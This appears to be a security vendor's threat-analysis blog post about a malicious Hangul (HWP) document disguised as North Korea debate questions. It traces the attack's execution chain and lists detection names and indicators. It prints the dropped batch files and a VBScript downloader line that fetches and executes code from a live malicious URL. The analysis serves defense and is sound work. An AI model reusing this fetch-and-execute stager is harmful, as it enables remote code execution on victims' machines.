Distribution of Hangul Word Processor (HWP) File with Title of North Korea-related Question

Previously, ASEC analysis team discovered the surge in the distribution of malicious Word files containing North Korea-related materials and shared detailed information about this trend. And today, ASEC analysis team has discovered the distribution of malware disguised as HWP files that contain North Korea-related questions.

Judging by the information within the HWP file, the malware developer must have modified the document with North Korea-related questions that were used on December 15, 2020, during the debate on North Korea. This malicious HWP file contains ‘link object,’ a technique that was introduced in previous blog post, and it is assumed that the malicious document was created in the system that acquires the PC name of Snow via path information where the object was inserted (C:\Users\Snow\AppData\Local\Temp).

  • Document Title: Questions-December15th.hwp
  • Document Details
Figure 1 – Text within the document file
Figure 2 – Developer username Snow

As shown in the Figure 1, the malware was distributed and disguised as a document file with questions written by a certain broadcasting media, and it contains a malicious object within. Previously, it was possible to check the included object in the file that was discovered before. But today, the attacker set a password and placed an edit restriction on the document, preventing people without a password from viewing the property of the object.

However, one similarity with the previous document is that an object was inserted into the document and it was used as a link to the relative path. If the malicious document is not located in the file path ‘C:\User\[Username]\AppData\,’ the internal malicious object cannot be run. Although it was not possible to check object properties due to password lock, we believe that the reason why the malware cannot refer to the location is that it is designated as the relative path.

Upon running the document in the file path that matches the condition and clicking the object that is wrapping the in-file window, TroubleShooter.bat in the file path below is run from the malicious HWP file.

  • Created File

– %TEMP%\TroubleShooter.bat

start /min %temp%\Diagnostics.bat

– %TEMP%\Diagnostics.bat

start wscript //b //e:vbscript %temp%\HncConfig.ini
exit

– %TEMP%\HncConfig.ini

On Error Resume Next:Set x = CreateObject("MSXML2.ServerXMLHTTP.6.0"):x.open "GET", "http://yegip.kr/se2/photo_uploader/plugin/update/list.php?query=0", 0:x.Send:rt=x.responseText:Execute(rt)

The file that actually executes malicious behavior is HncConfig.ini file which attempts to connect to the additional malicious URL; however, it is not possible to confirm the malicious behavior that takes place afterward, because data cannot be received from the network at this time.

  • Order of execution: TroubleShooter.bat > Run Diagnostics.bat > Run HncCongif.ini > Connect to malicious URL
  • Malicious URL : hxxp://yegip.kr/se2/photo_uploader/plugin/update/list.php?query=0

Various types of document files disguised as North Korea-related materials are being distributed recently. Therefore, all users including those who are engaged in North Korea-related field must take extra caution when handling files to prevent any damage from document files disguised as question documents like above.

V3, AhnLab’s anti-malware solution, has implemented the detection in its 2021.04.09.04 engine, and the current detection status of other anti-malware providers are as follows:

Figure 3 – Detection status board of VirusTotal

V3 products detect and block the files using the following aliases:

[File Detection]

  • Dropper/HWP.Agent (2021.04.09.04)
  • Trojan/BAT.Runner (2021.04.09.04)
  • Downloader/VBS.Agent (2021.04.09.04)

[IOC]

  • hxxp://yegip.kr/se2/photo_uploader/plugin/update/list.php?query=0
5 2 votes
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments